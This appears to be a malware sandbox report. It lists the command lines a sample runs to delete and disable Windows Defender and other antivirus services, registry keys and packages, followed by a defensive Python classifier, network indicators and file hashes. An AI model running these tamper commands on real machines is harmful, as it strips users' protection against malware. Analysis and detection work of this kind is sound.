sc delete MBAMService
C:\Windows\system32\sc.exe
sc config MBAMService start= disabled
C:\Windows\system32\sc.exe
sc stop nsWscSvc
C:\Windows\system32\sc.exe
sc delete windefend
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f
C:\Windows\system32\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
C:\Windows\system32\taskkill.exe
taskkill /f /im SystemSettings.exe
C:\Windows\System32\taskkill.exe
taskkill /f /im SecurityHealthService.exe
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\937B2A0B-291B-4F71-8243-9C9820669BC2\dismhost.exe {418040CE-5D0F-4A87-AFFE-3CB37680E851}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\6C5E4D15-DBE6-4E55-A993-7D93B8CCBA15\dismhost.exe {880B7798-5C9C-475D-92AA-2DE845763EF5}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\88A2D0B7-7C24-4495-8D9E-1F1CEC1C422F\dismhost.exe {F51D587E-8FF6-4937-AD32-AD752C23D0AC}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\EDE7CFFD-5509-49E7-9932-F9337B53F2BC\dismhost.exe {31354C29-D3BB-4B19-948A-2B0DB4949433}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\B51B9057-C91E-401A-BB67-42F504BD0D10\dismhost.exe {A3EE0EA6-E1F1-437A-B03A-CD69BE63D526}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Defender-Group-Policy-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\40C316FB-2070-4D39-B3FB-19D0B49130AC\dismhost.exe {48F81515-E0DB-4CED-BA8D-B978C62A199A}
C:\Windows\system32\Dism.exe
dism /online /remove-package /packagename:Windows-Shield-Provider-Core-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart
C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\DE5D499E-F7B0-4291-8C13-E04A8F350107\dismhost.exe {46F08BF2-CF4F-46D3-A95F-08B16B3C6FB6}
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f
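Read top to bottom, the process list above is a batch-driven Defender-removal routine rather than a set of unrelated commands: sc.exe stops, disables and then deletes the security services (windefend, WdNisSvc, Sense, SecurityHealthService, wscsvc) and the update services that could restore them (wuauserv, usosvc, WaasMedicSvc); reg.exe deletes the Defender, Security Center and ATP keys plus the CBS package owner keys; dism.exe uninstalls the Windows-Defender-* packages; taskkill.exe kills the remaining UI and helper processes; and finally two reg add calls suppress MRT delivery and hide the Defender settings page. Third-party products (Malwarebytes, ByteFence, Avast) get the same treatment. The following Python classifier is an added example for detecting this pattern from process command lines, not part of the sandbox report or of the sample. The command lines embedded as input are copied from the Processes section above; the service and process name lists, the tag names and the "two or more families" threshold are this example's own assumptions and should be tuned to your environment.

```python
"""Classify Windows process command lines for security-tool tampering.

Added example, not part of the sandbox report. Name lists and thresholds
are assumptions chosen to match the command lines visible in the report.
"""
import re
from collections import Counter

# Services whose stop/config/delete indicates tampering with security tooling
# (assumption: drawn from the sc.exe command lines in the report).
SECURITY_SERVICES = {
    "windefend", "wdnissvc", "sense", "securityhealthservice", "wscsvc",
    "mbamservice", "bytefenceservice", "avast! antivirus", "avast! tools",
    "nswscsvc",
}
# Servicing/update services; disabling them prevents Defender from coming back.
UPDATE_SERVICES = {"wuauserv", "usosvc", "waasmedicsvc"}
# Image names killed by the sample that belong to security products.
SECURITY_PROCESSES = {
    "smartscreen.exe", "securityhealthservice.exe", "mpcopyaccelerator.exe",
    "mbamwsc.exe", "mbam.exe", "bytefence.exe",
}
# Registry locations touched by the sample: Defender, Security Center, ATP,
# Defender driver services, CBS Defender packages, MRT and settings-page policy.
DEFENDER_REG = re.compile(
    r"windows defender|security center|security ?health|sechealthui|"
    r"advanced threat protection|windows-defender-|windows-shield-provider|"
    r"\\services\\(wscsvc|wdboot|wdfilter|wdnisdrv|wdnissvc)\b|"
    r"contextmenuhandlers\\epp|policies\\microsoft\\mrt|settingspagevisibility"
)
DEFENDER_PKG = re.compile(r"windows-(defender|shield-provider)-")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted args whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def classify(cmdline):
    """Return the set of tamper families a single command line belongs to."""
    toks = tokenize(cmdline)
    if not toks:
        return set()
    exe = toks[0].lower().rsplit("\\", 1)[-1]   # strip any directory prefix
    exe = exe[:-4] if exe.endswith(".exe") else exe
    args = [t.lower() for t in toks[1:]]
    tags = set()
    if exe == "sc" and len(args) >= 2 and args[0] in ("stop", "config", "delete"):
        if args[1] in SECURITY_SERVICES:
            tags.add("service-security")
        elif args[1] in UPDATE_SERVICES:
            tags.add("service-update")
    elif exe == "reg" and len(args) >= 2 and args[0] in ("delete", "add"):
        if DEFENDER_REG.search(" ".join(args[1:])):
            tags.add("registry-defender")
    elif exe == "dism" and "/remove-package" in args:
        if any(DEFENDER_PKG.search(a) for a in args):
            tags.add("dism-defender")
    elif exe == "taskkill" and "/im" in args:
        i = args.index("/im")
        if i + 1 < len(args) and args[i + 1] in SECURITY_PROCESSES:
            tags.add("taskkill-security")
    return tags


def summarize(cmdlines):
    """Count families over a process list and flag the combined pattern."""
    counts = Counter()
    for c in cmdlines:
        counts.update(classify(c))
    # Assumption: two or more distinct Defender-tamper families in one process
    # tree is the alerting threshold; update-service tampering alone is not.
    core = {"service-security", "registry-defender", "dism-defender", "taskkill-security"}
    return {"counts": dict(counts), "defender_tamper": len(core & set(counts)) >= 2}


# Constructed input: command lines copied from the report's Processes section,
# plus two benign-looking ones (Spooler, reg query, SystemSettings) as controls.
SAMPLE_CMDLINES = [
    "sc stop windefend",
    "sc config windefend start= disabled",
    "sc delete windefend",
    "sc stop WdNisSvc",
    "sc stop wuauserv",
    "sc config WaasMedicSvc start= disabled",
    "sc stop Spooler",
    'sc config "avast! Antivirus" start= disabled',
    r'reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"',
    r'reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f',
    "dism /online /remove-package /packagename:Windows-Defender-Client-Package~31bf3856ad364e35~amd64~~10.0.19041.1165 /NoRestart",
    "taskkill /f /im smartscreen.exe",
    "taskkill /f /im SystemSettings.exe",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(f"{sorted(classify(line)) or '-'}\t{line}")
    print(summarize(SAMPLE_CMDLINES))
```

In practice the input would be Sysmon Event ID 1 or Security 4688 command lines grouped by parent process; the point of grouping is that each individual sc or reg call is also something an administrator might run, while five families within one cmd.exe tree in a few seconds is not.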
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 45.139.105.147:1234 | N/A | tcp |
| N/A | 93.184.220.29:80 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | N/A | tcp |
| N/A | 20.42.65.89:443 | N/A | tcp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 104.110.191.133:80 | N/A | tcp |
| N/A | 104.110.191.133:80 | N/A | tcp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 45.139.105.147:1234 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 45.139.105.147:1234 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:1234 | N/A | tcp |
Files
memory/5088-132-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/4696-135-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/4672-138-0x0000000000000000-mapping.dmp
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/4696-142-0x0000000000400000-0x000000000043D000-memory.dmp
memory/1092-141-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/4428-145-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/4428-148-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/1868-150-0x0000000000000000-mapping.dmp
memory/1988-149-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7DF0.tmp\7DF0.tmp\7DF1.bat
| MD5 | a9364ef8f38cb959002706b2cc5ca9b4 |
| SHA1 | 4fbfdd5dbab4c63cdae4876c16f09d0e2d83152a |
| SHA256 | 6eba0633df1319abc32f0a5e5464449b2648db207c7176d0e553dc9fe50f5b27 |
| SHA512 | a3496fc402264166470f9be89712eeff3f1ec7d8fde3d0bb4805d852dd6f4a426d5695895831faa53411d1d73fdcf24a8c6303a8898926f6af66a7589e32d4f3 |
memory/2752-152-0x0000000000000000-mapping.dmp
memory/1328-153-0x0000000000000000-mapping.dmp
memory/540-155-0x0000000000000000-mapping.dmp
memory/176-158-0x0000000000000000-mapping.dmp
memory/2080-157-0x0000000000000000-mapping.dmp
memory/4016-159-0x0000000000000000-mapping.dmp
memory/208-160-0x0000000000000000-mapping.dmp
memory/4024-161-0x0000000000000000-mapping.dmp
memory/4292-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\7DEF.tmp\7DF0.tmp\7DF1.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
memory/4020-162-0x0000000000000000-mapping.dmp
memory/4964-163-0x0000000000000000-mapping.dmp
memory/2504-164-0x0000000000000000-mapping.dmp
memory/4316-165-0x0000000000000000-mapping.dmp
memory/3516-166-0x0000000000000000-mapping.dmp
memory/1048-167-0x0000000000000000-mapping.dmp
memory/3364-169-0x0000000000000000-mapping.dmp
memory/4816-168-0x0000000000000000-mapping.dmp
memory/4820-170-0x0000000000000000-mapping.dmp
memory/4480-171-0x0000000000000000-mapping.dmp
memory/3552-172-0x0000000000000000-mapping.dmp
memory/2824-173-0x0000000000000000-mapping.dmp
memory/1788-174-0x0000000000000000-mapping.dmp
memory/1916-175-0x0000000000000000-mapping.dmp
memory/1980-176-0x0000000000000000-mapping.dmp
memory/2296-177-0x0000000000000000-mapping.dmp
memory/4228-178-0x0000000000000000-mapping.dmp
memory/2772-179-0x0000000000000000-mapping.dmp
memory/4072-180-0x0000000000000000-mapping.dmp
memory/3096-181-0x0000000000000000-mapping.dmp
memory/4184-182-0x0000000000000000-mapping.dmp
memory/1908-183-0x0000000000000000-mapping.dmp
memory/2548-184-0x0000000000000000-mapping.dmp
memory/2196-186-0x0000000000000000-mapping.dmp
memory/1968-185-0x0000000000000000-mapping.dmp
memory/5112-187-0x0000000000000000-mapping.dmp
memory/4380-188-0x0000000000000000-mapping.dmp
memory/936-189-0x0000000000000000-mapping.dmp
memory/1460-190-0x0000000000000000-mapping.dmp
memory/1204-191-0x0000000000000000-mapping.dmp
memory/1464-192-0x0000000000000000-mapping.dmp
memory/1260-193-0x0000000000000000-mapping.dmp
memory/3192-194-0x0000000000000000-mapping.dmp
memory/4088-195-0x0000000000000000-mapping.dmp
memory/4424-198-0x0000000000000000-mapping.dmp
memory/3892-197-0x0000000000000000-mapping.dmp
memory/4884-196-0x0000000000000000-mapping.dmp
memory/4348-199-0x0000000000000000-mapping.dmp
memory/3000-201-0x0000000000000000-mapping.dmp
memory/2252-202-0x0000000000000000-mapping.dmp
memory/1684-200-0x0000000000000000-mapping.dmp
memory/928-203-0x0000000000000000-mapping.dmp
memory/2480-204-0x0000000000000000-mapping.dmp
memory/2228-205-0x0000000000000000-mapping.dmp
memory/2664-206-0x0000000000000000-mapping.dmp
memory/2768-207-0x0000000000000000-mapping.dmp
memory/3152-208-0x0000000000000000-mapping.dmp
memory/2692-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DismHost.exe
| MD5 | e5d5e9c1f65b8ec7aa5b7f1b1acdd731 |
| SHA1 | dbb14dcda6502ab1d23a7c77d405dafbcbeb439e |
| SHA256 | e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80 |
| SHA512 | 7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc |
memory/1912-212-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DismCorePS.dll
| MD5 | a033f16836d6f8acbe3b27b614b51453 |
| SHA1 | 716297072897aea3ec985640793d2cdcbf996cf9 |
| SHA256 | e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e |
| SHA512 | ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DismProv.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\OSProvider.dll
| MD5 | db4c3a07a1d3a45af53a4cf44ed550ad |
| SHA1 | 5dea737faadf0422c94f8f50e9588033d53d13b3 |
| SHA256 | 2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758 |
| SHA512 | 5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\dismprov.dll
| MD5 | 490be3119ea17fa29329e77b7e416e80 |
| SHA1 | c71191c3415c98b7d9c9bbcf1005ce6a813221da |
| SHA256 | ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a |
| SHA512 | 6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\LogProvider.dll
| MD5 | 815a4e7a7342224a239232f2c788d7c0 |
| SHA1 | 430b7526d864cfbd727b75738197230d148de21a |
| SHA256 | a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2 |
| SHA512 | 0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349 |
C:\Windows\Logs\DISM\dism.log
| MD5 | c34ad3c4515e1549a2ccaab2c5f7785a |
| SHA1 | 8da31738c093d416b789ac7776d1394dbf824b49 |
| SHA256 | c659bded4594f52945703bac7ee80528fbae4d6f60e3d0957b505845dd2483fd |
| SHA512 | a2fc9758e9c21b38ea041547371727be0a7ef60334b73338be44c45302461285420728aa41b9ab283d327b5ca38e44a50afadfaa4a56f31639aac2fed9a96518 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\CbsProvider.dll
| MD5 | 6ad0376a375e747e66f29fb7877da7d0 |
| SHA1 | a0de5966453ff2c899f00f165bbff50214b5ea39 |
| SHA256 | 4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f |
| SHA512 | 8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18 |
memory/4428-222-0x0000000074A80000-0x0000000074AB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\dismprov.dll.mui
| MD5 | 7d06108999cc83eb3a23eadcebb547a5 |
| SHA1 | 200866d87a490d17f6f8b17b26225afeb6d39446 |
| SHA256 | cf8cc85cdd12cf4a02df5274f8d0cdc625c6409fe80866b3052b7d5a862ac311 |
| SHA512 | 9f024aa89392fbbbabe62a58857e5ad5250e05f23d7f78fc9a09f535463446796dd6e37aab5e38dfc0bf5b15533844f63b3bddcb5cb9335901e099f65f9d8002 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\DismCore.dll.mui
| MD5 | 7a15f6e845f0679de593c5896fe171f9 |
| SHA1 | 0c923dfaffb56b56cba0c28a4eacb66b1b91a1f4 |
| SHA256 | f91e3c35b472f95d7b1ae3dc83f9d6bfde33515aa29e8b310f55d9fe66466419 |
| SHA512 | 5a0373f1fb076a0059cac8f30fe415e06ed880795f84283911bec75de0977baf52432b740b429496999cedf5cca45efd6ef010700e2d9a1887438056c8c573ca |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\DmiProvider.dll
| MD5 | ea8488990b95ce4ef6b4e210e0d963b2 |
| SHA1 | cd8bf723aa9690b8ca9a0215321e8148626a27d1 |
| SHA256 | 04f851b9d5e58ed002ad768bdcc475f22905fb1dab8341e9b3128df6eaa25b98 |
| SHA512 | 56562131cbe5f0ea5a2508f5bfed88f21413526f1539fe4864ece5b0e03a18513f3db33c07e7abd7b8aaffc34a7587952b96bb9990d9f4efa886f613d95a5b1b |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\FfuProvider.dll
| MD5 | df785c5e4aacaee3bd16642d91492815 |
| SHA1 | 286330d2ab07512e1f636b90613afcd6529ada1e |
| SHA256 | 56cc8d139be12e969fff3bbf47b1f5c62c3db887e3fb97c79cf7d285076f9271 |
| SHA512 | 3566de60fe76b63940cff3579da94f404c0bc713f2476ba00b9de12dc47973c7c22d5eed1fd667d20cea29b3c3c4fa648e5f44667e8369c192a4b69046e6f745 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\GenericProvider.dll
| MD5 | ef7e2760c0a24453fc78359aea3d7869 |
| SHA1 | 0ea67f1fd29df2615da43e023e86046e8e46e2e1 |
| SHA256 | d39f38402a9309ddd1cba67be470ede348f2bc1bab2f8d565e8f15510761087a |
| SHA512 | be785ba6b564cc4e755b4044ae27f916c009b7d942fcd092aed2ae630b1704e8a2f8b4692648eed481a5eb5355fd2e1ef7f94f6fb519b7e1ff6fc3c5f1aaa06f |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\IntlProvider.dll
| MD5 | 510e132215cef8d09be40402f355879b |
| SHA1 | cae8659f2d3fd54eb321a8f690267ba93d56c6f1 |
| SHA256 | 1bb39f3389aa4258a923fa265afa2279688e6cdb14ff771f1621a56b03ddcf52 |
| SHA512 | 2f7b2ec0e94738838f755759cd35e20ab2138b8eca023ee6ef630ab83a3de1bc0792f12ea0d722abe9a6953626cbddf8ba55ea32fc794d2df677a0625e498ab0 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\TransmogProvider.dll
| MD5 | 84ae9659e8d28c2bd19d45dbe32b6736 |
| SHA1 | 2a47058eafab4135a55575a359fbd22390788e93 |
| SHA256 | 943ea79ccbbb9790723f411720777af386acc03efab709ac2cbfeb7bd040a3e4 |
| SHA512 | d108a4a8699cd98576a5de9ce2f925697ece546fb441a76db6a922564ea70c54449cb1e8ac049a203979331c2c0ee7790d090ae5bb72d8d5e02786ef1cca530d |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\UnattendProvider.dll.mui
| MD5 | 8acee3337dfd444254bb8abdd3c29ada |
| SHA1 | 25d98d3426f32fa199c026b6eb829b469609b2e3 |
| SHA256 | 11f7957b8cc57dd7176f62b0612e658d6588b7caa8be4db3a337953b02b98c24 |
| SHA512 | 2849978060fa6e1fcfa37c870ae59ef22a67c0f8653468e07803422497fcc7275409ed0c36fe2d8e88026c13c82705abed771b4492761eead24cb5c32bdf2ea7 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\UnattendProvider.dll
| MD5 | f7bd21c4170b1397eb098fa18ef45d4b |
| SHA1 | 05d36abc4853eda468eab68d289337962c76195f |
| SHA256 | 05da5af89fafe492adf5255a7dbf16468be6d130ee8a9d713ab2182c72346db0 |
| SHA512 | 8a804bfe27f25b9d7c87cfb6951e1f1254e984ff9eada0b1547c30352397438d2c9e2f1c3b42c2db43f693b08224e0c7b7a17cd0b21ced893e12c330b91355ff |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\TransmogProvider.dll.mui
| MD5 | 2138fda89b1a5a18b32aed1d8762cde5 |
| SHA1 | a476f7dc86e62c7dc0edf27bb778174348cac566 |
| SHA256 | a75288f9e83cccf2a6a644ff78e6c26dadd5772a2626f80120b81975664e7dab |
| SHA512 | d7cbf569b5d57730c81fc121e92e1042a37e07922c02f36efac3769622f40234c70dafe9ed88a659d90c3855b5240f67f99b55ddecc46eea0e28e5b80ecc820b |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\SysprepProvider.dll.mui
| MD5 | 93d076056dd01dfc64d95d4c552a2dff |
| SHA1 | a90fd06a62c6d63d87e00f5f7e9646b44d2c726a |
| SHA256 | 4389362a9dc662aa3c7a1d830498472bc586e00f0d269a8541975a34b03a1aa4 |
| SHA512 | b089574d4be0ccae205219c9e256de34c039081a547f05acfe4165d036b175de5d9676160effc3c19d87bbb41d0f415da598e507ed8f7b302cdbfdfb81f694ee |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\SysprepProvider.dll
| MD5 | 8bd67d87dbdcf881fb9c1f4f6bf83f46 |
| SHA1 | 10bd2e541b6a125c29f05958f496edf31ff9abb1 |
| SHA256 | f9b4d0afe87f434e8319556961b292ddc7d3a8c6fc06b8a08a50b5a96e28a204 |
| SHA512 | 258a4075a3149669ccd6ff602f71a721b195c9d15dea22d994d4d3e35cdf27beb0b8b8f5da8f52914f769642f89edbb1d9d857087778be713a874571a2ec6f89 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\en-US\SmiProvider.dll.mui
| MD5 | f32e38247d0b21476bbfb49989478f7e |
| SHA1 | b950fd72ea2a6a94ee049454df562aed79ca1e35 |
| SHA256 | a1a302e940f6d6718700737b787af7a2053ef68b5ea2ec61497e7ae2444c5835 |
| SHA512 | f483807d790a4bc3e68d6d1f986bd4a57b4a67c91fb3dbef88220a4b510f11d1190cdd98a857eb1937e921e668dff2bcb5e4a7df640b1f3639ce6d2239ff8106 |
C:\Users\Admin\AppData\Local\Temp\987E6406-8E9A-495B-96FD-990451531DCB\SmiProvider.dll
| MD5 | ad7bbb62335f6dc36214d8c9fe1aaca0 |
| SHA1 | f03cb2db64c361d47a1c21f6d714e090d695b776 |
| SHA256 | ac1e7407317859981d253fd9d977e246a4d0da24572c45efe0ade1745376bffb |
